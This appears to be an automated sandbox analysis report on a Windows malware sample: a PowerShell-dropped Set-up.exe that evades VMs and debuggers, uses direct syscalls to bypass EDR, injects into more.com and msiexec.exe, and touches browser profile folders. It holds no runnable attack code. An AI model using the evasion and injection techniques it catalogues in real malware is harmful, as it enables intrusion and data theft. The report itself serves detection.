Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\SysWOW64\msiexec.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	API/Special instruction interceptor: Address: 6B827C44
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	API/Special instruction interceptor: Address: 6B827945
Source: C:\Windows\SysWOW64\more.com	API/Special instruction interceptor: Address: 6B823B54
Source: C:\Windows\SysWOW64\msiexec.exe	API/Special instruction interceptor: Address: 6BC87
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	API/Special instruction interceptor: Address: 6B267C44

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6499	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3148	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2127	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 908	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdisps.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\AdTree.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvptxJitCompiler32.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\more.com	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\exdefo	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\updater\nvdispsr.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\trading_api64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\AbRoot.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\opengl64.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x64\tradingnetworkingsockets.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\QHUPRmIp\x86\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep time: -11990383647911201s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 3492	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076	Thread sleep count: 2127 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 416	Thread sleep count: 908 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB581A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,	9_2_6BB581A1
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB8C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,	9_2_6BB8C8FD
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB8CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,	9_2_6BB8CC23

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BB7BE38 GetSystemInfo,_memset,GetVersionExW,Concurrency::unsupported_os::unsupported_os,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,Concurrency::unsupported_os::unsupported_os,GetModuleHandleW,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,GetLastError,GetLastError,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,malloc,std::exception::exception,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,free,Concurrency::unsupported_os::unsupported_os,

9_2_6BB7BE38

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\3D Objects	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Mozilla	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\PeerDistRepub	Jump to behavior

Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yQEMUpZjyKIYLTZkj
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: LPCwWudIrXdYwZxiwWflNHGfsyXABv
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VlIRTRgRCNGvMci
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ugHGfSZGYjpurWhm
Source: powershell.exe, 00000000.00000002.1929469102.0000021603DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dGzkEHHGFSb
Source: powershell.exe, 00000000.00000002.1929469102.00000216029C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ePAqEMutyMY
Source: powershell.exe, 00000000.00000002.1929469102.00000216029C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ftqeMu
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: hGfsVl
Source: powershell.exe, 00000000.00000002.1929469102.0000021603DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: xVMCiCFWY
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ybHwbCwmfMHgFSUqMj
Source: powershell.exe, 00000000.00000002.1929469102.00000216029C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ChgfSzDuq
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DAAbvMcinZ
Source: powershell.exe, 00000000.00000002.1929469102.0000021603DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: DomhgfsfhGxu
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AnYCHgfsATwL
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmCIlrGAEL
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VboQemUt
Source: powershell.exe, 00000000.00000002.1929469102.0000021603DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VDuENmYxQBgqvmCIRejULMTL
Source: powershell.exe, 00000000.00000002.1929469102.00000216033C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: cjJzHHgfsXcS
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CQEmUempcImmOhxi
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zQKPmgJZHgfsMrHeXfLPdFak
Source: powershell.exe, 00000000.00000002.1929469102.0000021603DC5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CnqeMu
Source: powershell.exe, 00000000.00000002.1929469102.00000216047C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GUQEmUQmkEowyUB
Source: powershell.exe, 00000000.00000002.1929469102.00000216051C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: kDVmCIw
Source: powershell.exe, 00000000.00000002.1929469102.00000216029C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OIYeqeMuR
Source: powershell.exe, 00000000.00000002.1929469102.00000216029C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: HYsGGgpKQEmurKMGbMGK
Source: powershell.exe, 00000000.00000002.1929469102.00000216033C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: mvMCi
Source: powershell.exe, 00000000.00000002.1929469102.00000216033C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: numcxFjdyoqQEMu

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 8_2_02F1E3A0 LdrInitializeThunk,

8_2_02F1E3A0

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BB407A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,

9_2_6BB407A7

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

9_2_6BBBB5A7

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Code function: 9_2_6BBB9B6F __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__doserrno,_errno,__lseeki64_nolock,_get_osfhandle,SetEndOfFile,_errno,__doserrno,GetLastError,__lseeki64_nolock,

9_2_6BBB9B6F

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BB407A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,		9_2_6BB407A7
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: 9_2_6BBBAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,		9_2_6BBBAD2C

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	NtProtectVirtualMemory: Direct from: 0x76EF63E1	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	NtSetInformationThread: Direct from: 0x6F853539	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe

Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 69330			Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Memory written: C:\Windows\SysWOW64\msiexec.exe base: 2C6C008			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe "C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com	Jump to behavior
Source: C:\Windows\SysWOW64\more.com	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,	9_2_6BB473B4
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_6BBBF356
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,	9_2_6BB452E4
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	9_2_6BBBF2EF
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,	9_2_6BB47270
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,	9_2_6BB4767A
Source: C:\Users\user\AppData\Roaming\QHUPRmIp\Set-up.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,	9_2_6BB4750C

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
